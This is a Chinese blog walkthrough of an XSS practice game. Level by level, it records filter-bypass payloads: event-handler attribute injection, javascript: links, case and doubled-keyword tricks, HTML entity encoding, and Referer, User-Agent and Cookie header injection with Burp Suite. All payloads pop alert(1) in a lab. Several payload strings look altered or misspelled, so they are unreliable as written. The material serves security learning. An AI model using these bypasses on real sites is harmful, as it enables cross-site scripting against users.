欢迎光临散文网 会员登陆 & 注册

xss小游戏

2023-03-08 16:52 作者:笨蛋灬你变了  | 我要投稿

第一关:level1.php?name=test

  1. 将URL里的test修改为benda,查看页面变化“欢迎用户bendan”

  2. benda改为<jscript>alert(1)</jscript>

第二关:/level2.php?keyword=test

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入"><jscript>alert(1)</jscript>

第三关:/level3.php?writing=wait

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入<jscript>alert(1)</jscript>,页面显示:没有找到和<jscript>alert(1)</jscript>相关的结果 开发者工具显示:<>被过滤了

  3. 输入框输入" jonclick="alert(1)",页面显示:没有找到和" jonclick="alert(1)"相关的结果 开发者工具:“被过滤

  4. 输入框输入' jonclick='alert(1)',页面显示:没有找到和' jonclick=alert(1)'相关的结果,点击过关

第四关:level4.php?keyword=try%20harder!

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入<jscript>alert(1)</jscript>,页面显示:没有找到和<jscript>alert(1)</jscript>相关的结果 开发者工具显示:<>被过滤了

  3. 输入框输入" jonclick="alert(1)",页面显示:没有找到和" jonclick="alert(1)"相关的结果,点击过关

第五关:level5.php?keyword=find%20a%20way%20out!

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入"><jscript>alert(1)</jscript>,页面显示:没有找到和"><jscript>alert(1)</jscript>相关的结果开发者工具:<input name=keyword  value=""><scr_ipt>alert(1)</jscript>">

  3. 输入框输入" jonclick="alert(1)",页面显示:没有找到和" jonclick="alert(1)"相关的结果 开发者工具:<input name=keyword  value="" o_nclick="alert(1)"">

  4. 编码、大小写、双写均不能过关

  5. 构造伪协议:"> <a href="jjavascript:alert(1)">点击链接过关

第六关:level6.php?keyword=break%20it%20out!

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入"><jscript>alert(1)</jscript>,页面显示:没有找到和"><jscript>alert(1)</jscript>相关的结果开发者工具:<input name=keyword  value=""><scr_ipt>alert(1)</jscript>">

  3. 输入框输入" jonclick="alert(1)",页面显示:没有找到和" jonclick="alert(1)"相关的结果 开发者工具:<input name=keyword  value="" o_nclick="alert(1)"">

  4. 构造伪协议:"> <a href="jjavascript:alert(1)">,页面显示:没有找到和"> <a href="jjavascript:alert(1)">相关的结果. 开发者工具:<input name=keyword  value=""> <a hr_ef="jjavascript:alert(1)">"> <input name=keyword  value=""><img sr_c='jjavascript:alert(1)' >">

  5. 大小写绕过href——hRef,点击链接过关

第七关:/level7.php?keyword=move%20up!

  1. 有输入框,输入bendan,页面显示:没有找到和bendan相关的结果

  2. 输入框输入"><jscript>alert(1)</jscript>,页面显示:没有找到和"><jscript>alert(1)</jscript>相关的结果开发者工具:<input name=keyword  value=""><>jalert(1)</>"> 字符jscript被过滤,,大小写无效

  3. 输入框输入" jonclick="alert(1)",页面显示:没有找到和" jonclick="alert(1)"相关的结果 开发者工具:<input name=keyword  value="" click="alert(1)""> 字符 jonclick中的on被过滤,大小写无效。双写oonn过关

第八关:/level8.php?keyword=nice%20try!

  1. 有输入框,输入bendan,页面无明显变化

  2. 输入框输入"><jscript>alert(1)</jscript> 开发者响应源码:第一处:> < "被过滤,第二处:"被过滤且scr_ipt

  3. 输入框输入" jonclick="alert(1)" 响应源码:</center><center><BR><a href="&quot o_nclick=&quotalert(1)&quot">友情链接</a></center>

  4. 输入框输入jjavascript:alert(1) 响应源码:</center><center><BR><a href="jjavascr_ipt:alert(1)">友情链接</a></center><center>

  5. jjavascript:alert(1)全部进行html编码,点击链接过关

    &#106&#97&#118&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

    简单一点:只需要将ri进行html实体编码:jjavasc&#114&#105;pt:alert(1)

第九关:level9.php?keyword=not%20bad!

  1. 有输入框,输入bendan,页面无明显变化 响应源码:<a href="您的链接不合法?有没有!">

  2. 输入一个链接:http://www.baidu.com 再次输入:http://123 响应源码:<a href="http://123">友情链接</a>

  3. 输入框输入http://jjavascript:alert(1) 响应源码:</center><center><BR><a href="http://javascr_ipt:alert(1)">友情链接</a></center><center>

  4. 反复确认后证明只需要有http:// 这个字符就行:输入jjavascript:alert(1)//http://。用//注释后面所有代码 响应源码:<a href="jjavascr_ipt:alert(1)//http://">友情链接</a>

  5. 将 ri 进行html实体编码:jjavascript:alert(1)//http:// 点击链接过关

第十关:level10.php?keyword=well%20done!

  1. 没有输入框,页面显示well done与URLwell done一致,在URL输入bendan。页面显示:没有找到和bendan相关的结果

  2. URL输入:<jscript>alert(1)</jscript> 响应源码:有三个隐藏的input标签 用burpsuite软件显示隐藏标签并高亮,输入内容后无法提交。修改在开发者工具element中创建提交按钮。

  3. 说明第三个输入框可以进行利用:输入"><jscript>alert(1)</jscript> 响应源码:<input name="t_sort"  value=""scriptalert(1)/script"> 说明:<>被过滤

  4. 输入:" onclick="alert(1)"   点击过关

第十一关:/level11.php?keyword=good%20job!

  1. 在三个输入框中输入不同内容,仍旧是第三个可以利用。

  2. 输入:"><jscript>alert(1)</jscript>。显示<>" 被过滤。无法利用

  3. 比较第四框中内容为HTTP请求头中的 referer,使用bp进行拦截并修改为<jscript>alert(2)</jscript> 响应源码:scriptalert(2)/script 说明<>被过滤

  4. 修改为:" jonclick="alert(1)"。点击过关

第十二关:level12.php?keyword=good%20job!

  1. 比较第四框中内容为HTTP请求头中的 User-Agent,使用bp进行拦截并修改为<jscript>alert(2)</jscript> 响应源码:scriptalert(2)/script 说明<>被过滤

  2. 修改为:" jonclick="alert(1)"。点击过关

第十三关:level13.php?keyword=good%20job!

  1. 四个输入框输入不同内容 页面显示:

  2. 输入<jscript>alert(2)</jscript>和" jonclick="alert(1)" 响应源码显示:<>"被过滤

  3. 只能用第四个框:对比内容为HTTP请求头中的Cookie: user=。 使用bp进行拦截并修改为" onclick="alert(1)"。点击过关

第十四关:level14.php(未完成)

第十五关:在img标签添加jonload='alert(1)'

第十六关:在img标签添加jonload='alert(1)'

第十七关:jonmouseout=alert(1)

第十八关:同上

第十九关:同上

第二十关:同上


仅供学习交流

xss小游戏的评论 (共 条)

分享到微博请遵守国家法律